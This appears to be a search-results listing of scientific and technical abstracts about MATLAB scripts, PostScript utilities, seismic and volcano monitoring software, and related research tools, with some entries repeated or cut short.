This report discusses the following topics on the LAMDA program: General maintenance; CTSS FCL script; DOS batch files; Macintosh MPW scripts; UNICOS FCL script; VAX/MS command file; LINC calling tree; and LAMDA calling tree.
LAMDA programmer`s manual. [Final report, Part 1
DOE Office of Scientific and Technical Information (OSTI.GOV)
Hughes, T.P.; Clark, R.M.; Mostrom, M.A.
This report discusses the following topics on the LAMDA program: General maintenance; CTSS FCL script; DOS batch files; Macintosh MPW scripts; UNICOS FCL script; VAX/MS command file; LINC calling tree; and LAMDA calling tree.
Patrick, Matthew R.; Kauahikaua, James P.; Antolik, Loren
2010-01-01
Webcams are now standard tools for volcano monitoring and are used at observatories in Alaska, the Cascades, Kamchatka, Hawai'i, Italy, and Japan, among other locations. Webcam images allow invaluable documentation of activity and provide a powerful comparative tool for interpreting other monitoring datastreams, such as seismicity and deformation. Automated image processing can improve the time efficiency and rigor of Webcam image interpretation, and potentially extract more information on eruptive activity. For instance, Lovick and others (2008) provided a suite of processing tools that performed such tasks as noise reduction, eliminating uninteresting images from an image collection, and detecting incandescence, with an application to dome activity at Mount St. Helens during 2007. In this paper, we present two very simple automated approaches for improved characterization and quantification of volcanic incandescence in Webcam images at Kilauea Volcano, Hawai`i. The techniques are implemented in MATLAB (version 2009b, Copyright: The Mathworks, Inc.) to take advantage of the ease of matrix operations. Incandescence is a useful indictor of the location and extent of active lava flows and also a potentially powerful proxy for activity levels at open vents. We apply our techniques to a period covering both summit and east rift zone activity at Kilauea during 2008?2009 and compare the results to complementary datasets (seismicity, tilt) to demonstrate their integrative potential. A great strength of this study is the demonstrated success of these tools in an operational setting at the Hawaiian Volcano Observatory (HVO) over the course of more than a year. Although applied only to Webcam images here, the techniques could be applied to any type of sequential images, such as time-lapse photography. We expect that these tools are applicable to many other volcano monitoring scenarios, and the two MATLAB scripts, as they are implemented at HVO, are included in the appendixes. These scripts would require minor to moderate modifications for use elsewhere, primarily to customize directory navigation. If the user has some familiarity with MATLAB, or programming in general, these modifications should be easy. Although we originally anticipated needing the Image Processing Toolbox, the scripts in the appendixes do not require it. Thus, only the base installation of MATLAB is needed. Because fairly basic MATLAB functions are used, we expect that the script can be run successfully by versions earlier than 2009b.
Tools for Integrating Data Access from the IRIS DMC into Research Workflows
NASA Astrophysics Data System (ADS)
Reyes, C. G.; Suleiman, Y. Y.; Trabant, C.; Karstens, R.; Weertman, B. R.
2012-12-01
Web service interfaces at the IRIS Data Management Center (DMC) provide access to a vast archive of seismological and related geophysical data. These interfaces are designed to easily incorporate data access into data processing workflows. Examples of data that may be accessed include: time series data, related metadata, and earthquake information. The DMC has developed command line scripts, MATLAB® interfaces and a Java library to support a wide variety of data access needs. Users of these interfaces do not need to concern themselves with web service details, networking, or even (in most cases) data conversion. Fetch scripts allow access to the DMC archive and are a comfortable fit for command line users. These scripts are written in Perl and are well suited for automation and integration into existing workflows on most operating systems. For metdata and event information, the Fetch scripts even parse the returned data into simple text summaries. The IRIS Java Web Services Library (IRIS-WS Library) allows Java developers the ability to create programs that access the DMC archives seamlessly. By returning the data and information as native Java objects the Library insulates the developer from data formats, network programming and web service details. The MATLAB interfaces leverage this library to allow users access to the DMC archive directly from within MATLAB (r2009b or newer), returning data into variables for immediate use. Data users and research groups are developing other toolkits that use the DMC's web services. Notably, the ObsPy framework developed at LMU Munich is a Python Toolbox that allows seamless access to data and information via the DMC services. Another example is the MATLAB-based GISMO and Waveform Suite developments that can now access data via web services. In summary, there now exist a host of ways that researchers can bring IRIS DMC data directly into their workflows. MATLAB users can use irisFetch.m, command line users can use the various Fetch scripts, Java users can use the IRIS-WS library, and Python users may request data through ObsPy. To learn more about any of these clients see http://www.iris.edu/ws/wsclients/.
EQS Goes R: Simulations for SEM Using the Package REQS
ERIC Educational Resources Information Center
Mair, Patrick; Wu, Eric; Bentler, Peter M.
2010-01-01
The REQS package is an interface between the R environment of statistical computing and the EQS software for structural equation modeling. The package consists of 3 main functions that read EQS script files and import the results into R, call EQS script files from R, and run EQS script files from R and import the results after EQS computations.…
A Simple Modeling Tool and Exercises for Incoming Solar Radiation Demonstrations
ERIC Educational Resources Information Center
Werts, Scott; Hinnov, Linda
2011-01-01
We present a MATLAB script INSOLATE.m that calculates insolation at the top of the atmosphere and the total amount of daylight during the year (and other quantities) with respect to geographic latitude and Earth's obliquity (axial tilt). The script output displays insolation values for an entire year on a three-dimensional graph. This tool…
ImageJ-MATLAB: a bidirectional framework for scientific image analysis interoperability.
Hiner, Mark C; Rueden, Curtis T; Eliceiri, Kevin W
2017-02-15
ImageJ-MATLAB is a lightweight Java library facilitating bi-directional interoperability between MATLAB and ImageJ. By defining a standard for translation between matrix and image data structures, researchers are empowered to select the best tool for their image-analysis tasks. Freely available extension to ImageJ2 ( http://imagej.net/Downloads ). Installation and use instructions available at http://imagej.net/MATLAB_Scripting. Tested with ImageJ 2.0.0-rc-54 , Java 1.8.0_66 and MATLAB R2015b. eliceiri@wisc.edu. Supplementary data are available at Bioinformatics online. © The Author 2016. Published by Oxford University Press. All rights reserved. For Permissions, please e-mail: journals.permissions@oup.com
DOE Office of Scientific and Technical Information (OSTI.GOV)
Myronakis, M; Cai, W; Dhou, S
Purpose: To design a comprehensive open-source, publicly available, graphical user interface (GUI) to facilitate the configuration, generation, processing and use of the 4D Extended Cardiac-Torso (XCAT) phantom. Methods: The XCAT phantom includes over 9000 anatomical objects as well as respiratory, cardiac and tumor motion. It is widely used for research studies in medical imaging and radiotherapy. The phantom generation process involves the configuration of a text script to parameterize the geometry, motion, and composition of the whole body and objects within it, and to generate simulated PET or CT images. To avoid the need for manual editing or script writing,more » our MATLAB-based GUI uses slider controls, drop-down lists, buttons and graphical text input to parameterize and process the phantom. Results: Our GUI can be used to: a) generate parameter files; b) generate the voxelized phantom; c) combine the phantom with a lesion; d) display the phantom; e) produce average and maximum intensity images from the phantom output files; f) incorporate irregular patient breathing patterns; and f) generate DICOM files containing phantom images. The GUI provides local help information using tool-tip strings on the currently selected phantom, minimizing the need for external documentation. The DICOM generation feature is intended to simplify the process of importing the phantom images into radiotherapy treatment planning systems or other clinical software. Conclusion: The GUI simplifies and automates the use of the XCAT phantom for imaging-based research projects in medical imaging or radiotherapy. This has the potential to accelerate research conducted with the XCAT phantom, or to ease the learning curve for new users. This tool does not include the XCAT phantom software itself. We would like to acknowledge funding from MRA, Varian Medical Systems Inc.« less
TOPPE: A framework for rapid prototyping of MR pulse sequences.
Nielsen, Jon-Fredrik; Noll, Douglas C
2018-06-01
To introduce a framework for rapid prototyping of MR pulse sequences. We propose a simple file format, called "TOPPE", for specifying all details of an MR imaging experiment, such as gradient and radiofrequency waveforms and the complete scan loop. In addition, we provide a TOPPE file "interpreter" for GE scanners, which is a binary executable that loads TOPPE files and executes the sequence on the scanner. We also provide MATLAB scripts for reading and writing TOPPE files and previewing the sequence prior to hardware execution. With this setup, the task of the pulse sequence programmer is reduced to creating TOPPE files, eliminating the need for hardware-specific programming. No sequence-specific compilation is necessary; the interpreter only needs to be compiled once (for every scanner software upgrade). We demonstrate TOPPE in three different applications: k-space mapping, non-Cartesian PRESTO whole-brain dynamic imaging, and myelin mapping in the brain using inhomogeneous magnetization transfer. We successfully implemented and executed the three example sequences. By simply changing the various TOPPE sequence files, a single binary executable (interpreter) was used to execute several different sequences. The TOPPE file format is a complete specification of an MR imaging experiment, based on arbitrary sequences of a (typically small) number of unique modules. Along with the GE interpreter, TOPPE comprises a modular and flexible platform for rapid prototyping of new pulse sequences. Magn Reson Med 79:3128-3134, 2018. © 2017 International Society for Magnetic Resonance in Medicine. © 2017 International Society for Magnetic Resonance in Medicine.
NASA Astrophysics Data System (ADS)
Wessel, Paul; Luis, Joaquim F.
2017-02-01
The GMT/MATLAB toolbox is a basic interface between MATLAB® (or Octave) and GMT, the Generic Mapping Tools, which allows MATLAB users full access to all GMT modules. Data may be passed between the two programs using intermediate MATLAB structures that organize the metadata needed; these are produced when GMT modules are run. In addition, standard MATLAB matrix data can be used directly as input to GMT modules. The toolbox improves interoperability between two widely used tools in the geosciences and extends the capability of both tools: GMT gains access to the powerful computational capabilities of MATLAB while the latter gains the ability to access specialized gridding algorithms and can produce publication-quality PostScript-based illustrations. The toolbox is available on all platforms and may be downloaded from the GMT website.
Using 3-D Numerical Weather Data in Piloted Simulations
NASA Technical Reports Server (NTRS)
Daniels, Taumi S.
2016-01-01
This report describes the process of acquiring and using 3-D numerical model weather data sets in NASA Langley's Research Flight Deck (RFD). A set of software tools implement the process and can be used for other purposes as well. Given time and location information of a weather phenomenon of interest, the user can download associated numerical weather model data. These data are created by the National Oceanic and Atmospheric Administration (NOAA) High Resolution Rapid Refresh (HRRR) model, and are then processed using a set of Mathworks' Matlab(TradeMark) scripts to create the usable 3-D weather data sets. Each data set includes radar re ectivity, water vapor, component winds, temperature, supercooled liquid water, turbulence, pressure, altitude, land elevation, relative humidity, and water phases. An open-source data processing program, wgrib2, is available from NOAA online, and is used along with Matlab scripts. These scripts are described with sucient detail to make future modi cations. These software tools have been used to generate 3-D weather data for various RFD experiments.
Strategies for Sharing Seismic Data Among Multiple Computer Platforms
NASA Astrophysics Data System (ADS)
Baker, L. M.; Fletcher, J. B.
2001-12-01
Seismic waveform data is readily available from a variety of sources, but it often comes in a distinct, instrument-specific data format. For example, data may be from portable seismographs, such as those made by Refraction Technology or Kinemetrics, from permanent seismograph arrays, such as the USGS Parkfield Dense Array, from public data centers, such as the IRIS Data Center, or from personal communication with other researchers through e-mail or ftp. A computer must be selected to import the data - usually whichever is the most suitable for reading the originating format. However, the computer best suited for a specific analysis may not be the same. When copies of the data are then made for analysis, a proliferation of copies of the same data results, in possibly incompatible, computer-specific formats. In addition, if an error is detected and corrected in one copy, or some other change is made, all the other copies must be updated to preserve their validity. Keeping track of what data is available, where it is located, and which copy is authoritative requires an effort that is easy to neglect. We solve this problem by importing waveform data to a shared network file server that is accessible to all our computers on our campus LAN. We use a Network Appliance file server running Sun's Network File System (NFS) software. Using an NFS client software package on each analysis computer, waveform data can then be read by our MatLab or Fortran applications without first copying the data. Since there is a single copy of the waveform data in a single location, the NFS file system hierarchy provides an implicit complete waveform data catalog and the single copy is inherently authoritative. Another part of our solution is to convert the original data into a blocked-binary format (known historically as USGS DR100 or VFBB format) that is interpreted by MatLab or Fortran library routines available on each computer so that the idiosyncrasies of each machine are not visible to the user. Commercial software packages, such as MatLab, also have the ability to share data in their own formats across multiple computer platforms. Our Fortran applications can create plot files in Adobe PostScript, Illustrator, and Portable Document Format (PDF) formats. Vendor support for reading these files is readily available on multiple computer platforms. We will illustrate by example our strategies for sharing seismic data among our multiple computer platforms, and we will discuss our positive and negative experiences. We will include our solutions for handling the different byte ordering, floating-point formats, and text file ``end-of-line'' conventions on the various computer platforms we use (6 different operating systems on 5 processor architectures).
Karpievitch, Yuliya V; Almeida, Jonas S
2006-01-01
Background Matlab, a powerful and productive language that allows for rapid prototyping, modeling and simulation, is widely used in computational biology. Modeling and simulation of large biological systems often require more computational resources then are available on a single computer. Existing distributed computing environments like the Distributed Computing Toolbox, MatlabMPI, Matlab*G and others allow for the remote (and possibly parallel) execution of Matlab commands with varying support for features like an easy-to-use application programming interface, load-balanced utilization of resources, extensibility over the wide area network, and minimal system administration skill requirements. However, all of these environments require some level of access to participating machines to manually distribute the user-defined libraries that the remote call may invoke. Results mGrid augments the usual process distribution seen in other similar distributed systems by adding facilities for user code distribution. mGrid's client-side interface is an easy-to-use native Matlab toolbox that transparently executes user-defined code on remote machines (i.e. the user is unaware that the code is executing somewhere else). Run-time variables are automatically packed and distributed with the user-defined code and automated load-balancing of remote resources enables smooth concurrent execution. mGrid is an open source environment. Apart from the programming language itself, all other components are also open source, freely available tools: light-weight PHP scripts and the Apache web server. Conclusion Transparent, load-balanced distribution of user-defined Matlab toolboxes and rapid prototyping of many simple parallel applications can now be done with a single easy-to-use Matlab command. Because mGrid utilizes only Matlab, light-weight PHP scripts and the Apache web server, installation and configuration are very simple. Moreover, the web-based infrastructure of mGrid allows for it to be easily extensible over the Internet. PMID:16539707
Karpievitch, Yuliya V; Almeida, Jonas S
2006-03-15
Matlab, a powerful and productive language that allows for rapid prototyping, modeling and simulation, is widely used in computational biology. Modeling and simulation of large biological systems often require more computational resources then are available on a single computer. Existing distributed computing environments like the Distributed Computing Toolbox, MatlabMPI, Matlab*G and others allow for the remote (and possibly parallel) execution of Matlab commands with varying support for features like an easy-to-use application programming interface, load-balanced utilization of resources, extensibility over the wide area network, and minimal system administration skill requirements. However, all of these environments require some level of access to participating machines to manually distribute the user-defined libraries that the remote call may invoke. mGrid augments the usual process distribution seen in other similar distributed systems by adding facilities for user code distribution. mGrid's client-side interface is an easy-to-use native Matlab toolbox that transparently executes user-defined code on remote machines (i.e. the user is unaware that the code is executing somewhere else). Run-time variables are automatically packed and distributed with the user-defined code and automated load-balancing of remote resources enables smooth concurrent execution. mGrid is an open source environment. Apart from the programming language itself, all other components are also open source, freely available tools: light-weight PHP scripts and the Apache web server. Transparent, load-balanced distribution of user-defined Matlab toolboxes and rapid prototyping of many simple parallel applications can now be done with a single easy-to-use Matlab command. Because mGrid utilizes only Matlab, light-weight PHP scripts and the Apache web server, installation and configuration are very simple. Moreover, the web-based infrastructure of mGrid allows for it to be easily extensible over the Internet.
Likelihood Ratio Test Polarimetric SAR Ship Detection Application
2005-12-01
menu. Under the Matlab menu, the user can export an area of an image to the MatlabTM MAT file format, as well as call RGB image and Pauli...must specify various parameters such as the area of the image to analyze. Export Image Area to MatlabTM (PoIGASP & COASP) Generates a MatlabTM file...represented by the Minister of National Defence, 2005 (0 Sa majest6 la reine, repr(sent(e par le ministre de la Defense nationale, 2005 Abstract This
[Discussion to the advanced application of scripting in RayStation TPS system].
Zhang, Jianying; Sun, Jing; Wang, Yun
2014-11-01
In this study, the implementation methods for the several functions are explored on RayStation 4.0 Platform. Those functions are passing the information such as ROI names to a plan prescription Word file. passing the file to RayStation for plan evaluation; passing the evaluation result to form an evaluated report file. The result shows the RayStation scripts can exchange data with Word, as well as control the running of Word and the content of a Word file. Consequently, it's feasible for scripts to inactive with third party softwares upgrade the performance of RayStation itself.
Kepler Fine Guidance Sensor Data
NASA Technical Reports Server (NTRS)
Van Cleve, Jeffrey; Campbell, Jennifer Roseanna
2017-01-01
The Kepler and K2 missions collected Fine Guidance Sensor (FGS) data in addition to the science data, as discussed in the Kepler Instrument Handbook (KIH, Van Cleve and Caldwell 2016). The FGS CCDs are frame transfer devices (KIH Table 7) located in the corners of the Kepler focal plane (KIH Figure 24), which are read out 10 times every second. The FGS data are being made available to the user community for scientific analysis as flux and centroid time series, along with a limited number of FGS full frame images which may be useful for constructing a World Coordinate System (WCS) or otherwise putting the time series data in context. This document will describe the data content and file format, and give example MATLAB scripts to read the time series. There are three file types delivered as the FGS data.1. Flux and Centroid (FLC) data: time series of star signal and centroid data. 2. Ancillary FGS Reference (AFR) data: catalog of information about the observed stars in the FLC data. 3. FGS Full-Frame Image (FGI) data: full-frame image snapshots of the FGS CCDs.
SolTrace FAQs | Concentrating Solar Power | NREL
that should be noted: when using a cubic spline file to describe a surface, if that file contains a help for script functions? A: Yes, when typing a script function within the scripting window, as you results. When the limit is reached, SolTrace generates the following error message (Windows version; Mac
NASA Astrophysics Data System (ADS)
Beauducel, François; Bosson, Alexis; Randriamora, Frédéric; Anténor-Habazac, Christian; Lemarchand, Arnaud; Saurel, Jean-Marie; Nercessian, Alexandre; Bouin, Marie-Paule; de Chabalier, Jean-Bernard; Clouard, Valérie
2010-05-01
Seismological and Volcanological observatories have common needs and often common practical problems for multi disciplinary data monitoring applications. In fact, access to integrated data in real-time and estimation of measurements uncertainties are keys for an efficient interpretation, but instruments variety, heterogeneity of data sampling and acquisition systems lead to difficulties that may hinder crisis management. In Guadeloupe observatory, we have developed in the last years an operational system that attempts to answer the questions in the context of a pluri-instrumental observatory. Based on a single computer server, open source scripts (Matlab, Perl, Bash, Nagios) and a Web interface, the system proposes: an extended database for networks management, stations and sensors (maps, station file with log history, technical characteristics, meta-data, photos and associated documents); a web-form interfaces for manual data input/editing and export (like geochemical analysis, some of the deformation measurements, ...); routine data processing with dedicated automatic scripts for each technique, production of validated data outputs, static graphs on preset moving time intervals, and possible e-mail alarms; computers, acquisition processes, stations and individual sensors status automatic check with simple criteria (files update and signal quality), displayed as synthetic pages for technical control. In the special case of seismology, WebObs includes a digital stripchart multichannel continuous seismogram associated with EarthWorm acquisition chain (see companion paper Part 1), event classification database, location scripts, automatic shakemaps and regional catalog with associated hypocenter maps accessed through a user request form. This system leads to a real-time Internet access for integrated monitoring and becomes a strong support for scientists and technicians exchange, and is widely open to interdisciplinary real-time modeling. It has been set up at Martinique observatory and installation is planned this year at Montserrat Volcanological Observatory. It also in production at the geomagnetic observatory of Addis Abeba in Ethiopia.
PSTOOLS - FOUR PROGRAMS THAT INTERPRET/FORMAT POSTSCRIPT FILES
NASA Technical Reports Server (NTRS)
Choi, D.
1994-01-01
PSTOOLS is a package of four programs that operate on files written in the page description language, PostScript. The programs include a PostScript previewer for the IRIS workstation, a PostScript driver for the Matrix QCRZ film recorder, a PostScript driver for the Tektronix 4693D printer, and a PostScript code beautifier that formats PostScript files to be more legible. The three programs PSIRIS, PSMATRIX, and PSTEK are similar in that they all interpret the PostScript language and output the graphical results to a device, and they support color PostScript images. The common code which is shared by these three programs is included as a library of routines. PSPRETTY formats a PostScript file by appropriately indenting procedures and code delimited by "saves" and "restores." PSTOOLS does not use Adobe fonts. PSTOOLS is written in C-language for implementation on SGI IRIS 4D series workstations running IRIX 3.2 or later. A README file and UNIX man pages provide information regarding the installation and use of the PSTOOLS programs. A six-page manual which provides slightly more detailed information may be purchased separately. The standard distribution medium for this package is one .25 inch streaming magnetic tape cartridge in UNIX tar format. PSIRIS (the largest program) requires 1.2Mb of main memory. PSMATRIX requires the "gpib" board (IEEE 488) available from Silicon Graphics. Inc. The programs with graphical interfaces require that the IRIS have at least 24 bit planes. This package was developed in 1990 and updated in 1991. SGI, IRIS 4D, and IRIX are trademarks of Silicon Graphics, Inc. Matrix QCRZ is a registered trademark of the AGFA Group. Tektronix 4693D is a trademark of Tektronix, Inc. Adobe is a trademark of Adobe Systems Incorporated. PostScript is a registered trademark of Adobe Systems Incorporated. UNIX is a registered trademark of AT&T Bell Laboratories.
Boyd, O.S.
2006-01-01
We have created a second-order finite-difference solution to the anisotropic elastic wave equation in three dimensions and implemented the solution as an efficient Matlab script. This program allows the user to generate synthetic seismograms for three-dimensional anisotropic earth structure. The code was written for teleseismic wave propagation in the 1-0.1 Hz frequency range but is of general utility and can be used at all scales of space and time. This program was created to help distinguish among various types of lithospheric structure given the uneven distribution of sources and receivers commonly utilized in passive source seismology. Several successful implementations have resulted in a better appreciation for subduction zone structure, the fate of a transform fault with depth, lithospheric delamination, and the effects of wavefield focusing and defocusing on attenuation. Companion scripts are provided which help the user prepare input to the finite-difference solution. Boundary conditions including specification of the initial wavefield, absorption and two types of reflection are available. ?? 2005 Elsevier Ltd. All rights reserved.
ANLPS. Graphics Driver for PostScript Output
DOE Office of Scientific and Technical Information (OSTI.GOV)
Engert, D.E.
1987-09-01
ANLPS is a PostScript graphics device driver for use with the proprietary CA TELLAGRAF, CUECHART, and DISSPLA products. The driver allows the user to create and send text and graphics output in the Adobe Systems` PostScript page description language, which is accepted by many print devices. The PostScript output can be generated by TELLAGRAF 6.0 and DISSPLA 10.0. The files containing the PostScript output are sent to PostScript laser printers, such as the Apple LaserWriter. It is not necessary to initialize the printer, as the output for each plot is self-contained. All CA fonts are mapped to PostScript fonts, e.g.more » Swiss-Medium is mapped to Helvetica, and the mapping is easily changed. Hardware shading and hardware characters, area fill, and color are included. Auxiliary routines are provided which allow graphics files containing figures, logos, and diagrams to be merged with text files. The user can then position, scale, and rotate the figures on the output page in the reserved area specified.« less
KEGGParser: parsing and editing KEGG pathway maps in Matlab.
Arakelyan, Arsen; Nersisyan, Lilit
2013-02-15
KEGG pathway database is a collection of manually drawn pathway maps accompanied with KGML format files intended for use in automatic analysis. KGML files, however, do not contain the required information for complete reproduction of all the events indicated in the static image of a pathway map. Several parsers and editors of KEGG pathways exist for processing KGML files. We introduce KEGGParser-a MATLAB based tool for KEGG pathway parsing, semiautomatic fixing, editing, visualization and analysis in MATLAB environment. It also works with Scilab. The source code is available at http://www.mathworks.com/matlabcentral/fileexchange/37561.
Sobie, Eric A
2011-09-13
This two-part lecture introduces students to the scientific computing language MATLAB. Prior computer programming experience is not required. The lectures present basic concepts of computer programming logic that tend to cause difficulties for beginners in addition to concepts that relate specifically to the MATLAB language syntax. The lectures begin with a discussion of vectors, matrices, and arrays. Because many types of biological data, such as fluorescence images and DNA microarrays, are stored as two-dimensional objects, processing these data is a form of array manipulation, and MATLAB is especially adept at handling such array objects. The students are introduced to basic commands in MATLAB, as well as built-in functions that provide useful shortcuts. The second lecture focuses on the differences between MATLAB scripts and MATLAB functions and describes when one method of programming organization might be preferable to the other. The principles are illustrated through the analysis of experimental data, specifically measurements of intracellular calcium concentration in live cells obtained using confocal microscopy.
Sobie, Eric A.
2014-01-01
This two-part lecture introduces students to the scientific computing language MATLAB. Prior computer programming experience is not required. The lectures present basic concepts of computer programming logic that tend to cause difficulties for beginners in addition to concepts that relate specifically to the MATLAB language syntax. The lectures begin with a discussion of vectors, matrices, and arrays. Because many types of biological data, such as fluorescence images and DNA microarrays, are stored as two-dimensional objects, processing these data is a form of array manipulation, and MATLAB is especially adept at handling such array objects. The students are introduced to basic commands in MATLAB, as well as built-in functions that provide useful shortcuts. The second lecture focuses on the differences between MATLAB scripts and MATLAB functions and describes when one method of programming organization might be preferable to the other. The principles are illustrated through the analysis of experimental data, specifically measurements of intracellular calcium concentration in live cells obtained using confocal microscopy. PMID:21934110
Flight Dynamics and Control of a Morphing UAV: Bio inspired by Natural Fliers
2017-02-17
Approved for public release: distribution unlimited. IV Modelling and Sizing Tornado Vortex Lattice Method (VLM) was used for aerodynamic prediction... Tornado is a Vortex Lattice Method software programmed in MATLAB; it was selected due to its fast solving time and ability to be controlled through...custom MATLAB scripts. Tornado VLM models the wing as thin sheet of discrete vortices and computes the pressure and force distributions around the
The Deterministic Mine Burial Prediction System
2009-01-12
or below the water-line, initial linear and angular velocities, and fall angle relative to the mine’s axis of symmetry. Other input data needed...c. Run_DMBP.m: start-up MATLAB script for the program 2. C:\\DMBP\\DMBP_src: This directory contains source code, geotechnical databases, and...approved for public release). b. \\Impact_35: The IMPACT35 model c. \\MakeTPARfiles: scripts for creating wave height and wave period input data from
Autoplot: a Browser for Science Data on the Web
NASA Astrophysics Data System (ADS)
Faden, J.; Weigel, R. S.; West, E. E.; Merka, J.
2008-12-01
Autoplot (www.autoplot.org) is software for plotting data from many different sources and in many different file formats. Data from CDF, CEF, Fits, NetCDF, and OpenDAP can be plotted, along with many other sources such as ASCII tables and Excel spreadsheets. This is done by adapting these various data formats and APIs into a common data model that borrows from the netCDF and CDF data models. Autoplot uses a web browser metaphor to simplify use. The user specifies a parameter URL, for example a CDF file accessible via http with a parameter name appended, and the file resource is downloaded and the parameter is rendered in a scientifically meaningful way. When data span multiple files, the user can use a file name template in the URL to aggregate (combine) a set of remote files. So the problem of aggregating data across file boundaries is handled on the client side, allowing simple web servers to be used. The das2 graphics library provides rich controls for exploring the data. Scripting is supported through Python, providing not just programmatic control, but for calculating new parameters in a language that will look familiar to IDL and Matlab users. Autoplot is Java-based software, and will run on most computers without a burdensome installation process. It can also used as an applet or as a servlet that serves static images. Autoplot was developed as part of the Virtual Radiation Belt Observatory (ViRBO) project, and is also being used for the Virtual Magnetospheric Observatory (VMO). It is expected that this flexible, general-purpose plotting tool will be useful for allowing a data provider to add instant visualization capabilities to a directory of files or for general use in the Virtual Observatory environment.
Forensic Analysis of Compromised Computers
NASA Technical Reports Server (NTRS)
Wolfe, Thomas
2004-01-01
Directory Tree Analysis File Generator is a Practical Extraction and Reporting Language (PERL) script that simplifies and automates the collection of information for forensic analysis of compromised computer systems. During such an analysis, it is sometimes necessary to collect and analyze information about files on a specific directory tree. Directory Tree Analysis File Generator collects information of this type (except information about directories) and writes it to a text file. In particular, the script asks the user for the root of the directory tree to be processed, the name of the output file, and the number of subtree levels to process. The script then processes the directory tree and puts out the aforementioned text file. The format of the text file is designed to enable the submission of the file as input to a spreadsheet program, wherein the forensic analysis is performed. The analysis usually consists of sorting files and examination of such characteristics of files as ownership, time of creation, and time of most recent access, all of which characteristics are among the data included in the text file.
2009-09-01
active scripting, file downloads, installation of desktop items, signed and unsigned ActiveX controls, Java permissions, launching applications and...files in an IFRAME, running ActiveX controls and plug-ins, and scripting of Java applets [49]. This security measure is very effective against DNS
Digital geologic map of the Butler Peak 7.5' quadrangle, San Bernardino County, California
Miller, Fred K.; Matti, Jonathan C.; Brown, Howard J.; digital preparation by Cossette, P. M.
2000-01-01
Open-File Report 00-145, is a digital geologic map database of the Butler Peak 7.5' quadrangle that includes (1) ARC/INFO (Environmental Systems Research Institute) version 7.2.1 Patch 1 coverages, and associated tables, (2) a Portable Document Format (.pdf) file of the Description of Map Units, Correlation of Map Units chart, and an explanation of symbols used on the map, btlrpk_dcmu.pdf, (3) a Portable Document Format file of this Readme, btlrpk_rme.pdf (the Readme is also included as an ascii file in the data package), and (4) a PostScript plot file of the map, Correlation of Map Units, and Description of Map Units on a single sheet, btlrpk.ps. No paper map is included in the Open-File report, but the PostScript plot file (number 4 above) can be used to produce one. The PostScript plot file generates a map, peripheral text, and diagrams in the editorial format of USGS Geologic Investigation Series (I-series) maps.
Semi automatic indexing of PostScript files using Medical Text Indexer in medical education.
Mollah, Shamim Ara; Cimino, Christopher
2007-10-11
At Albert Einstein College of Medicine a large part of online lecture materials contain PostScript files. As the collection grows it becomes essential to create a digital library to have easy access to relevant sections of the lecture material that is full-text indexed; to create this index it is necessary to extract all the text from the document files that constitute the originals of the lectures. In this study we present a semi automatic indexing method using robust technique for extracting text from PostScript files and National Library of Medicine's Medical Text Indexer (MTI) program for indexing the text. This model can be applied to other medical schools for indexing purposes.
Using MATLAB Software on the Peregrine System | High-Performance Computing
Learn how to run MATLAB software in batch mode on the Peregrine system. Below is an example MATLAB job in batch (non-interactive) mode. To try the example out, create both matlabTest.sub and /$USER. In this example, it is also the directory into which MATLAB will write the output file x.dat
CER_SRBAVG_Aqua-FM3-MODIS_Edition2A
Atmospheric Science Data Center
2014-07-24
... Readme Files: Readme R4-671 UNIX C shell scripts for extracting regional CERES geo and non-geo fluxes from ... Software Files : Read Package (C) UNIX C shell scripts for extracting regional CERES geo and non-geo fluxes from ...
Defining Geodetic Reference Frame using Matlab®: PlatEMotion 2.0
NASA Astrophysics Data System (ADS)
Cannavò, Flavio; Palano, Mimmo
2016-03-01
We describe the main features of the developed software tool, namely PlatE-Motion 2.0 (PEM2), which allows inferring the Euler pole parameters by inverting the observed velocities at a set of sites located on a rigid block (inverse problem). PEM2 allows also calculating the expected velocity value for any point located on the Earth providing an Euler pole (direct problem). PEM2 is the updated version of a previous software tool initially developed for easy-to-use file exchange with the GAMIT/GLOBK software package. The software tool is developed in Matlab® framework and, as the previous version, includes a set of MATLAB functions (m-files), GUIs (fig-files), map data files (mat-files) and user's manual as well as some example input files. New changes in PEM2 include (1) some bugs fixed, (2) improvements in the code, (3) improvements in statistical analysis, (4) new input/output file formats. In addition, PEM2 can be now run under the majority of operating systems. The tool is open source and freely available for the scientific community.
Yeast 5 – an expanded reconstruction of the Saccharomyces cerevisiae metabolic network
2012-01-01
Background Efforts to improve the computational reconstruction of the Saccharomyces cerevisiae biochemical reaction network and to refine the stoichiometrically constrained metabolic models that can be derived from such a reconstruction have continued since the first stoichiometrically constrained yeast genome scale metabolic model was published in 2003. Continuing this ongoing process, we have constructed an update to the Yeast Consensus Reconstruction, Yeast 5. The Yeast Consensus Reconstruction is a product of efforts to forge a community-based reconstruction emphasizing standards compliance and biochemical accuracy via evidence-based selection of reactions. It draws upon models published by a variety of independent research groups as well as information obtained from biochemical databases and primary literature. Results Yeast 5 refines the biochemical reactions included in the reconstruction, particularly reactions involved in sphingolipid metabolism; updates gene-reaction annotations; and emphasizes the distinction between reconstruction and stoichiometrically constrained model. Although it was not a primary goal, this update also improves the accuracy of model prediction of viability and auxotrophy phenotypes and increases the number of epistatic interactions. This update maintains an emphasis on standards compliance, unambiguous metabolite naming, and computer-readable annotations available through a structured document format. Additionally, we have developed MATLAB scripts to evaluate the model’s predictive accuracy and to demonstrate basic model applications such as simulating aerobic and anaerobic growth. These scripts, which provide an independent tool for evaluating the performance of various stoichiometrically constrained yeast metabolic models using flux balance analysis, are included as Additional files 1, 2 and 3. Conclusions Yeast 5 expands and refines the computational reconstruction of yeast metabolism and improves the predictive accuracy of a stoichiometrically constrained yeast metabolic model. It differs from previous reconstructions and models by emphasizing the distinction between the yeast metabolic reconstruction and the stoichiometrically constrained model, and makes both available as Additional file 4 and Additional file 5 and at http://yeast.sf.net/ as separate systems biology markup language (SBML) files. Through this separation, we intend to make the modeling process more accessible, explicit, transparent, and reproducible. PMID:22663945
DOE Office of Scientific and Technical Information (OSTI.GOV)
Kim, S; Alaei, P
2015-06-15
